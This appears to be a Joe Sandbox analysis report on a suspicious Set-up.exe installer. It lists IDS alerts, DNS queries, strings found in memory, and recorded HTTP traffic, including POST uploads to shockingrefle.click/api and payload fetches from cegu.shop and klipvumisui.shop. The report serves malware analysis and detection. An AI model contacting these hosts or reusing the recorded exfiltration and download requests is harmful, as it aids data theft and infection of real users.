              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 172.67.208.58:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.4:49758
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shockingrefle.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: shockingrefle.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1N21OVTWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18101Host: shockingrefle.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2I9FGWDOJKIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8740Host: shockingrefle.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EXPKA5AGLKN3XAIZA9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: shockingrefle.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=273BKNM4F5SFWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1227Host: shockingrefle.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0M5WO8B7JQXFWSWP6E2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1108Host: shockingrefle.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: shockingrefle.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: shockingrefle.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: dfgh.online
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shockingrefle.click
              Source: Set-up.exe, 00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016247632.000000000095F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1901630959.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916494967.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016469638.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.s
              Source: Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
              Source: Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
              Source: Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
              Source: Set-up.exe, 00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916410252.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1901630959.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
              Source: Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
              Source: Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
              Source: Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.securetrust.com/0?
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
              Source: Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
              Source: Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
              Source: Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Set-up.exe, 00000000.00000003.2016454308.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017176614.00000000009B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Set-up.exe, 00000000.00000003.2016454308.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017176614.00000000009B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtk5
              Source: Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
              Source: Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA05
              Source: Set-up.exe, 00000000.00000003.2016419178.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0:
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: Set-up.exe, 00000000.00000003.1828016050.00000000073C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: Set-up.exe, Set-up.exe, 00000000.00000003.2011990393.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016155088.00000000009DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Set-up.exe, 00000000.00000003.1968160850.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1964745312.000000000399E000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1969999675.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1969148116.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1963708736.000000000399F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1964586600.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1972396342.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1963413464.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960222831.0000000003987000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1959498000.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1970288259.00000000038B6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1957161932.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960921850.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960081479.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960448359.0000000003981000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1962734467.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1960734284.000000000398C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1964281016.000000000399B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1972252215.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1957892375.00000000038B1000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1959007296.000000000397E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: Set-up.exe, 00000000.00000003.2016155088.00000000009C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: Set-up.exe, 00000000.00000003.2016155088.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016469638.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Set-up.exe, 00000000.00000003.1889886158.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1890057983.00000000009D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.cl
              Source: Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/
              Source: Set-up.exe, 00000000.00000003.1863772475.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1874172879.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1901630959.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916494967.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1874509187.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1874172879.00000000009D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/api
              Source: Set-up.exe, 00000000.00000003.1863772475.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/api&
              Source: Set-up.exe, 00000000.00000003.2011990393.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017191602.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016155088.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916327724.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1901401410.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1907276556.00000000009C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/api)
              Source: Set-up.exe, 00000000.00000003.2011990393.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017191602.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016155088.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916327724.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1907276556.00000000009C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/api/
              Source: Set-up.exe, 00000000.00000003.1874172879.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/apiH
              Source: Set-up.exe, 00000000.00000003.1901630959.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/apitZ
              Source: Set-up.exe, 00000000.00000003.2016247632.000000000095F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1916494967.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2016469638.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017129214.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/bu
              Source: Set-up.exe, 00000000.00000003.1886496911.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shockingrefle.click/oba
              Source: Set-up.exe, 00000000.00000002.2017722041.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2011751929.000000000363D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2017889447.000000000363D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
              Source: Set-up.exe, 00000000.00000003.1851939199.000000000360E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Set-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Set-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Set-up.exe, 00000000.00000003.1863427908.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851939199.000000000360C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863686725.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852015791.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863868485.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852172233.0000000003605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Set-up.exe, 00000000.00000003.1852015791.00000000035E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Set-up.exe, 00000000.00000003.1863427908.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851939199.000000000360C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863686725.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852015791.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863868485.0000000003605000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852172233.0000000003605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Set-up.exe, 00000000.00000003.1852015791.00000000035E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Set-up.exe, 00000000.00000003.1851254970.00000000035DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Set-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Set-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Set-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Set-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Set-up.exe, 00000000.00000003.1875059104.00000000036D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: Set-up.exe, 00000000.00000003.1828016050.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016707111.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000000.1686187602.00000000004EE000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/download.html
              Source: Set-up.exe, 00000000.00000003.1828016050.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2016707111.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, Set-up.exe, 00000000.00000000.1686187602.00000000004EE000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP4
